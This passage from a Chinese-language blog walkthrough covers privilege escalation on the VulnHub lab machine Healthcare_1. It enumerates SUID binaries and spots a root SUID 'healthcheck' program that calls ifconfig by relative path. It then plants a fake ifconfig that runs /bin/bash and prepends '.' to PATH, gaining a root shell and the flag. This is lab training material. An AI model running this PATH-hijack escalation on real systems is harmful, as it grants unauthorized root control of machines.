137590  120 -rwsr-xr-x   1 root     root       122188 Nov 28  2010 /usr/bin/wvdial
137249   40 -rwsr-xr-x   1 root     root        39488 Dec 28  2010 /usr/bin/pmount
137440   64 -rws--x--x   1 root     root        63752 Jan 23  2010 /usr/bin/sperl5.10.1
136717  364 -rwsr-xr-x   1 root     root       370648 Jan 18  2011 /usr/bin/gpgsm
136708   56 -rwsr-xr-x   1 root     root        56100 Jan  9  2010 /usr/bin/gpasswd
136347   16 -rws--x--x   1 root     root        12400 Nov 16  2010 /usr/bin/chfn
137462   32 -r-sr-xr-x   1 root     root        31144 Nov 16  2010 /usr/bin/su
137181   24 -r-s--x--x   1 root     shadow      20512 Jan 30  2010 /usr/bin/passwd
136709  936 -rwsr-xr-x   1 root     root       956252 Oct 18  2010 /usr/bin/gpg
132151    8 -rwsr-sr-x   1 root     root         5813 Jul 29  2020 /usr/bin/healthcheck
136247    8 -rwsr-xr-x   1 root     root         5852 Sep 22  2011 /usr/bin/Xwrapper
137222   36 -rwsr-xr-x   1 root     root        35128 Nov 28  2010 /usr/bin/ping6
136351   12 -rws--x--x   1 root     root        11664 Nov 16  2010 /usr/bin/chsh
   172  308 -rwsr-x---   1 root     messagebus   314400 Sep 29  2011 /lib/dbus-1/dbus-daemon-launch-helper
136122   12 -rwsr-xr-x   1 root     root        11114 Jul  6  2011 /sbin/pam_timestamp_check
   123   36 -rwsr-xr-x   1 root     root        34848 Nov 28  2010 /bin/ping
    83   28 -rwsr-xr-x   1 root     root        26360 Oct 18  2011 /bin/fusermount
   144   32 -rwsr-xr-x   1 root     root        31144 Nov 16  2010 /bin/su
   111   80 -rwsr-xr-x   1 root     root        80748 Nov 16  2010 /bin/mount
   152   32 -rwsr-xr-x   1 root     root        31180 Nov 16  2010 /bin/umount

看到一个有意思的文件 /usr/bin/healthcheck

看一看权限

1
2
3

[medical@localhost default]$ ls -liah /usr/bin/healthcheck
ls -liah /usr/bin/healthcheck
132151 -rwsr-sr-x 1 root root 5.7K Jul 29  2020 /usr/bin/healthcheck

没法修改，尝试看看可读字符

[medical@localhost default]$ strings /usr/bin/healthcheck
strings /usr/bin/healthcheck
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
setuid
system
setgid
__libc_start_main
GLIBC_2.0
PTRhp
[^_]
clear ; echo 'System Health Check' ; echo '' ; echo 'Scanning System' ; sleep 2 ; ifconfig ; fdisk -l ; du -h

ifconfig 没有用绝对目录，开始尝试环境变量提权

[medical@localhost default]$ echo $PATH
echo $PATH
/sbin:/usr/sbin:/bin:/usr/bin:/usr/lib/qt4/bin
[medical@localhost default]$ cd /tmp
cd /tmp
[medical@localhost tmp]$ export PATH=.:$PATH
export PATH=.:$PATH
[medical@localhost tmp]$ echo $PATH
echo $PATH
.:/sbin:/usr/sbin:/bin:/usr/bin:/usr/lib/qt4/bin
[medical@localhost tmp]$ echo "/bin/bash" > ifconfig
echo "/bin/bash" > ifconfig
[medical@localhost tmp]$ chmod +x ifconfig
chmod +x ifconfig
[medical@localhost tmp]$ ls -laih
ls -laih
total 3.7M
393986 drwxrwxrwt  6 root     root     4.0K Aug 12 16:23 ./
     2 drwxr-xr-x 21 root     root     4.0K Aug 11 18:28 ../
417152 drwxrwxrwt  2 root     root     4.0K Aug 11 18:28 .ICE-unix/
420761 -r--r--r--  1 root     root       11 Aug 11 18:28 .X0-lock
420762 drwxrwxrwt  2 root     root     4.0K Aug 11 18:28 .X11-unix/
424825 -rw-r--r--  1 root     root     1.7K Aug 11 18:28 ddebug.log
424987 drwx------  2 medical  medical  4.0K Aug 12 15:52 gpg-1hljcK/
423301 drwx------  2 almirant almirant 4.0K Jul 29  2020 gpg-ycbRQr/
428578 -rwxr-xr-x  1 medical  medical    10 Aug 12 16:23 ifconfig*
425007 -rw-------  1 root     root        0 Jul 29  2020 init.vQ5ZLd
428666 -rw-r--r--  1 apache   apache   3.7M Jul 29  2020 setup_dump.sql
[medical@localhost tmp]$ /usr/bin/healthcheck
/usr/bin/healthcheck
TERM environment variable not set.
System Health Check

Scanning System
[root@localhost tmp]#

提权成功

[root@localhost tmp]# whoami
whoami
root
[root@localhost tmp]# id
id
uid=0(root) gid=0(root) groups=0(root),7(lp),19(floppy),22(cdrom),80(cdwriter),81(audio),82(video),83(dialout),100(users),490(polkituser),500(medical),501(fuse)
[root@localhost tmp]# cd /root
cd /root
[root@localhost root]# ls -alih
ls -alih
total 920K
393987 drwxr-x--- 20 root root 4.0K Jul 29  2020 ./
     2 drwxr-xr-x 21 root root 4.0K Aug 11 18:28 ../
411838 -rw-------  1 root root    0 Sep 11  2011 .ICEauthority
428659 -rw-------  1 root root  426 Jul 29  2020 .bash_history
411839 -rw-r--r--  1 root root  193 Sep 24  2011 .bash_profile
411840 -rw-rw-rw-  1 root root  422 Sep  6  2011 .bashrc
411841 drwxr-xr-x  2 root root 4.0K Sep 12  2011 .cache/
411843 drwx------  6 root root 4.0K Sep 12  2011 .config/
411855 drwx------  3 root root 4.0K Jul 19  2011 .dbus/
411858 -rw-------  1 root root   28 Jul 22  2011 .dmrc
411859 drwx------  4 root root 4.0K Sep 24  2011 .gconf/
411979 drwx------  2 root root 4.0K Sep 24  2011 .gconfd/
411981 drwx------  3 root root 4.0K Sep 12  2011 .gnome2/
411983 drwx------  2 root root 4.0K Sep 12  2011 .gnome2_private/
411835 drwx------  3 root root 4.0K Jul 29  2020 .gnupg/
411984 drwx------  2 root root 4.0K Jul 19  2011 .gvfs/
411985 drwx------  3 root root 4.0K Sep  6  2011 .local/
411995 drwx------  3 root root 4.0K Nov  5  2011 .mc/
411999 -rw-r--r--  1 root root    0 Oct 22  2010 .mdk-menu-migrated
412000 -rw-r--r--  1 root root    0 Jul 21  2011 .menu-updates.stamp
428664 -rw-------  1 root root    6 Jul 29  2020 .mysql_history
412001 drwx------  2 root root 4.0K Nov  5  2011 .synaptic/
412006 drwx------  2 root root 4.0K Sep 11  2011 .thumbnails/
412007 drwxr-xr-x  2 root root 4.0K Jul 29  2020 .xauth/
412008 -rw-r--r--  1 root root 1.9K Jul  6  2011 .xbindkeysrc
412009 drwxr--r--  2 root root 4.0K Jul 19  2011 Desktop/
412010 drwx------  3 root root 4.0K Sep  8  2011 Documents/
393989 drwx------  2 root root 4.0K Sep  6  2011 drakx/
430643 -rwxr-xr-x  1 root root 5.7K Jul 29  2020 healthcheck*
430637 -rw-r--r--  1 root root  182 Jul 29  2020 healthcheck.c
428662 -rw-rw-rw-  1 root root 2.1K Jul 29  2020 root.txt
430635 -rw-r--r--  1 root root 797K Apr 12  2020 sudo.rpm
393988 drwx------  2 root root 4.0K Aug 11 18:28 tmp/
[root@localhost root]# cat root.txt
cat root.txt
██    ██  ██████  ██    ██     ████████ ██████  ██ ███████ ██████      ██   ██  █████  ██████  ██████  ███████ ██████  ██ 
 ██  ██  ██    ██ ██    ██        ██    ██   ██ ██ ██      ██   ██     ██   ██ ██   ██ ██   ██ ██   ██ ██      ██   ██ ██ 
  ████   ██    ██ ██    ██        ██    ██████  ██ █████   ██   ██     ███████ ███████ ██████  ██   ██ █████   ██████  ██ 
   ██    ██    ██ ██    ██        ██    ██   ██ ██ ██      ██   ██     ██   ██ ██   ██ ██   ██ ██   ██ ██      ██   ██    
   ██     ██████   ██████         ██    ██   ██ ██ ███████ ██████      ██   ██ ██   ██ ██   ██ ██████  ███████ ██   ██ ██ 
                                                                                                                          
                                                                                                                          
Thanks for Playing!

Follow me at: http://v1n1v131r4.com


root hash: eaff25eaa9ffc8b62e3dfebf70e83a7b

knowledge_database > vulnhub

Healthcare_1 靶机

https://i3eg1nner.github.io/2023/08/c7207977b36b.html

作者

I3eg1nner

发布于

2023年8月11日

许可协议

sunset_dawn 靶机上一篇

chili_1 靶机下一篇